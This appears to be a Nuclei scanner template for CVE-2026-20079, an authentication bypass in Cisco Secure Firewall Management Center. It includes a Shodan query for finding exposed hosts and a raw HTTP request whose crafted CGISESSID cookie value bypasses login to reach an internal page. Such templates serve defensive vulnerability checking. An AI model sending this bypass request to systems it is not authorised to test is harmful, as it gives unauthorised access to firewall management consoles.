id: CVE-2026-20079 info: name: Cisco Secure Firewall Management Center - Authentication Bypass author: theamanrawat severity: critical description: | Cisco Secure Firewall Management Center Software contains an authentication bypass caused by improper system process creation at boot, letting unauthenticated remote attackers execute scripts and gain root access, exploit requires crafted HTTP requests. impact: | Unauthenticated remote attackers can gain root access by executing scripts, leading to full system compromise. remediation: | Update to the latest available version. reference: - https://www.vulncheck.com/blog/cisco-fmc-auth-bypass-cve-2026-20079 - https://nvd.nist.gov/vuln/detail/CVE-2026-20079 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2026-20079 epss-score: 0.387 epss-percentile: 0.98426 cwe-id: CWE-288 metadata: verified: true max-request: 1 shodan-query: html:"BackdraftSyncIntegration" tags: cve,cve2026,cisco,fmc,auth-bypass,rce,unauth flow: http(1) && http(2) http: - raw: - | GET /help/about.cgi HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 302' - 'contains(body, "Invalid session ID")' condition: and internal: true - raw: - | GET /help/about.cgi HTTP/1.1 Host: {{Hostname}} Cookie: CGISESSID=csm_processes matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "Cisco Secure Firewall Management Center", "Model", "OS", "Hostname")' condition: and # digest: 4a0a00473045022100b790d84a0edf70518b04075aa7a40f2ff44bd093f0d6d413327632daa73887df02204bd48ccee5a25efee41ba4fac3461b3333600a38d8a0c773e9133809f62d0b44:922c64590222798bb761d5b6d8e72950